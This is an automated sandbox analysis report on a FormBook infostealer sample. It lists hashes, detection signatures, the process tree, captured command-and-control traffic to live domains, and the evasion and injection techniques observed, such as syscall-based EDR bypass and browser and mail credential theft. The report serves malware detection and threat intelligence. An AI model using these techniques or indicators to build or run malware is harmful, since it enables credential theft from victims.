Edit tour

Windows Analysis Report
zAg7xx1vKI.exe

Overview

General Information

Sample name:	zAg7xx1vKI.exe renamed because original name is a hash value
Original sample name:	0a379ce2b635ae6c70c0893cf2ba64d653f9a0ac169c30b2dd49657ac422aecb.exe
Analysis ID:	1588661
MD5:	f8c4859851a35dc60c365f9bcdd876ec
SHA1:	4659f9fc49e48d0c2415901712856c462edce433
SHA256:	0a379ce2b635ae6c70c0893cf2ba64d653f9a0ac169c30b2dd49657ac422aecb
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

zAg7xx1vKI.exe (PID: 1100 cmdline: "C:\Users\user\Desktop\zAg7xx1vKI.exe" MD5: F8C4859851A35DC60C365F9BCDD876EC)

zAg7xx1vKI.exe (PID: 2112 cmdline: "C:\Users\user\Desktop\zAg7xx1vKI.exe" MD5: F8C4859851A35DC60C365F9BCDD876EC)

vMBXKWKIWTv.exe (PID: 6332 cmdline: "C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

cacls.exe (PID: 7312 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)

vMBXKWKIWTv.exe (PID: 764 cmdline: "C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3208 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2554149849.0000000002910000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2555827665.0000000002670000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2554298777.0000000002960000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1882756009.0000000000F70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2556015245.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1883972868.00000000013A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: zAg7xx1vKI.exe PID: 1100	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.zAg7xx1vKI.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.zAg7xx1vKI.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T03:50:08.120798+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49980	74.208.236.156	80	TCP
2025-01-11T03:50:31.360970+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49984	84.32.84.32	80	TCP
2025-01-11T03:50:44.505564+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49988	13.248.169.48	80	TCP
2025-01-11T03:50:58.219588+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.10	49992	66.29.149.46	80	TCP

HTTP traffic detected: POST /jytl/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.techmiseajour.netCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 191Origin: http://www.techmiseajour.netReferer: http://www.techmiseajour.net/jytl/User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36Data Raw: 6e 46 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 69 6d 4f 5a 31 5a 4b 78 66 63 56 2f 39 63 77 4a 5a 46 62 67 65 39 5a 6c 72 6f 77 35 Data Ascii: nF=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUimOZ1ZKxfcV/9cwJZFbge9Zlrow5

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Sat, 11 Jan 2025 02:50:08 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:50:50 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:50:52 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:50:55 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:50:58 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>

Source: vMBXKWKIWTv.exe, 00000009.00000002.2555827665.0000000002708000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.golivenow.live
Source: vMBXKWKIWTv.exe, 00000009.00000002.2555827665.0000000002708000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.golivenow.live/r2k9/
Source: cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cacls.exe, 00000006.00000002.2558663459.0000000003DDA000.00000004.10000000.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000009.00000002.2556655173.000000000347A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: cacls.exe, 00000006.00000002.2558663459.0000000003DDA000.00000004.10000000.00040000.00000000.sdmp, vMBXKWKIWTv.exe, 00000009.00000002.2556655173.000000000347A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cacls.exe, 00000006.00000002.2554437733.00000000029F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.s
Source: cacls.exe, 00000006.00000002.2554437733.00000000029F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: cacls.exe, 00000006.00000002.2554437733.0000000002A21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cacls.exe, 00000006.00000002.2554437733.00000000029F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cacls.exe, 00000006.00000002.2554437733.00000000029F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033(B
Source: cacls.exe, 00000006.00000002.2554437733.00000000029F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: cacls.exe, 00000006.00000002.2554437733.00000000029F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: cacls.exe, 00000006.00000003.2068666759.000000000792E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: cacls.exe, 00000006.00000002.2560684874.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.zAg7xx1vKI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.zAg7xx1vKI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2554149849.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2555827665.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2554298777.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1882756009.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556015245.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1883972868.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0042CE23 NtClose,	3_2_0042CE23
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2B60 NtClose,LdrInitializeThunk,	3_2_010C2B60
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_010C2DF0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_010C2C70
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C35C0 NtCreateMutant,LdrInitializeThunk,	3_2_010C35C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C4340 NtSetContextThread,	3_2_010C4340
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C4650 NtSuspendThread,	3_2_010C4650
